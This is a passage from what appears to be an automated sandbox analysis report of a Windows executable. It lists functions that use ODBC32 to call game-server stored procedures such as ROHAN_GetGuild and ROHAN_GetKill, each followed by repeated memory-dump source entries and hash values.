                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043A1DA
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetCharTitleList] (?)}, xrefs: 0043A15D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetCharTitleList] (?)}
                                                                                      • API String ID: 0-3948883892
                                                                                      • Opcode ID: 9aaa0ce0b1a2e0360bf9b3cd09e60a268900f897ada32ea8c0f12e60cd39e6d3
                                                                                      • Instruction ID: f338e7e4446f3d65a966a09e46f8e334fc586a1e601fd72908839fee37c8924a
                                                                                      • Opcode Fuzzy Hash: 9aaa0ce0b1a2e0360bf9b3cd09e60a268900f897ada32ea8c0f12e60cd39e6d3
                                                                                      • Instruction Fuzzy Hash: D21100B1A40258ABEB64DF44CC52FEA7334EB44714F244689F7147A2C0DAF569908B98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetCharCompletionTitleList] (?)},000000FD), ref: 0043A204
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043A243
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043A278
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetCharCompletionTitleList] (?)}, xrefs: 0043A1FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetCharCompletionTitleList] (?)}
                                                                                      • API String ID: 0-3616435941
                                                                                      • Opcode ID: c031eb1e828b228fbf3e85c59ec1486b10e21a195988f4756c7251cac7a1507f
                                                                                      • Instruction ID: fd32f341017e0632ff7a3efef9f28a0469f48f744017eecf50bdde3ec6648111
                                                                                      • Opcode Fuzzy Hash: c031eb1e828b228fbf3e85c59ec1486b10e21a195988f4756c7251cac7a1507f
                                                                                      • Instruction Fuzzy Hash: 6811E5F1A44258ABEB20EF54CD42F9A73B8EB48714F208689F6147E2C5D6F5AD408F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{?= CALL [ROHAN3_GetKill] (?)},000000FD), ref: 0043C318
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043C357
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043C38C
                                                                                      Strings
                                                                                      • {?= CALL [ROHAN3_GetKill] (?)}, xrefs: 0043C30F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {?= CALL [ROHAN3_GetKill] (?)}
                                                                                      • API String ID: 0-1301937699
                                                                                      • Opcode ID: 488be4c21ed19869d5874d721efaa772d67d15c0edb88102d33840c741b4a2f0
                                                                                      • Instruction ID: fa6aa14789f75735c7444a18801b0bcf674138e5a28a2350a1ac3bf44fa4aef7
                                                                                      • Opcode Fuzzy Hash: 488be4c21ed19869d5874d721efaa772d67d15c0edb88102d33840c741b4a2f0
                                                                                      • Instruction Fuzzy Hash: B01100B4A54219AFEB34CF44CC42FBA7334EB84714F208299F61C2A6C4C6B569409F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SetArenaRewardWeek](?)},000000FD), ref: 00440340
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044037F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004403B4
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SetArenaRewardWeek](?)}, xrefs: 00440337
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SetArenaRewardWeek](?)}
                                                                                      • API String ID: 0-3720194841
                                                                                      • Opcode ID: 33baec1826512aac8c41bb501ff39c6146d5db8925c503ad8243f372ef0ab134
                                                                                      • Instruction ID: 66ce791d58d909edbec1a27eee74feb54ca804be940b5bbda83caced3ba545c9
                                                                                      • Opcode Fuzzy Hash: 33baec1826512aac8c41bb501ff39c6146d5db8925c503ad8243f372ef0ab134
                                                                                      • Instruction Fuzzy Hash: D91125B1A48659BBEF20DF64CC46FDB7374EB44B14F204389F614AE2C0D6756D608B48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetGuild](?)},000000FD), ref: 0042D474
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D4B3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D4E8
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetGuild](?)}, xrefs: 0042D46B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetGuild](?)}
                                                                                      • API String ID: 0-534300538
                                                                                      • Opcode ID: 589906af4bdabec36a0a9d4aa6cbe55a3d3a79285a12e950af40bfaef81e8347
                                                                                      • Instruction ID: 4d830c7e1c4bf9a7c7f613cf70e6bbc3fc1c663c6b0380a856ab215f99acef0a
                                                                                      • Opcode Fuzzy Hash: 589906af4bdabec36a0a9d4aa6cbe55a3d3a79285a12e950af40bfaef81e8347
                                                                                      • Instruction Fuzzy Hash: 7D1100F1A40259ABEB34CF44CC52FAD7335FB44B14F108289F7186A2C1D6B569458F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ClearQuestCurrRank](?)},000000FD), ref: 004334D6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00433515
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043354A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ClearQuestCurrRank](?)}, xrefs: 004334CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ClearQuestCurrRank](?)}
                                                                                      • API String ID: 0-2169950939
                                                                                      • Opcode ID: 244144034c8e0958af2479250da3715b840f494a0b5d6a1016e041d0bfe472ca
                                                                                      • Instruction ID: 49c6cb33f1374b661fd5f1f518ab4ac9fa3ae561ead31da22f51a8c234ad03b2
                                                                                      • Opcode Fuzzy Hash: 244144034c8e0958af2479250da3715b840f494a0b5d6a1016e041d0bfe472ca
                                                                                      • Instruction Fuzzy Hash: 9311DEB1A85218ABFB24CF54CD52FAA7374EB84B14F10428BF7187E2C2D6B56D408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{?= CALL [ROHAN_GetKill] (?)},000000FD), ref: 0042F574
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042F5B3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042F5E8
                                                                                      Strings
                                                                                      • {?= CALL [ROHAN_GetKill] (?)}, xrefs: 0042F56B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {?= CALL [ROHAN_GetKill] (?)}
                                                                                      • API String ID: 0-3901951558
                                                                                      • Opcode ID: b67d2524bfd0f0510c93e19f26d0ad087f4e9ddf5889825a50bdb7880f03a732
                                                                                      • Instruction ID: 85df150c9a6756b5837916bd0548e95072903f05e642585ff1c039d39d5a0389
                                                                                      • Opcode Fuzzy Hash: b67d2524bfd0f0510c93e19f26d0ad087f4e9ddf5889825a50bdb7880f03a732
                                                                                      • Instruction Fuzzy Hash: 471116B1648614ABEB20CF64CC46F997375EB94B18F104389F61C6F2C4DA776D508B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetGameHelper] (?)},000000FD), ref: 00435578
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004355B7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004355EC
                                                                                      Strings
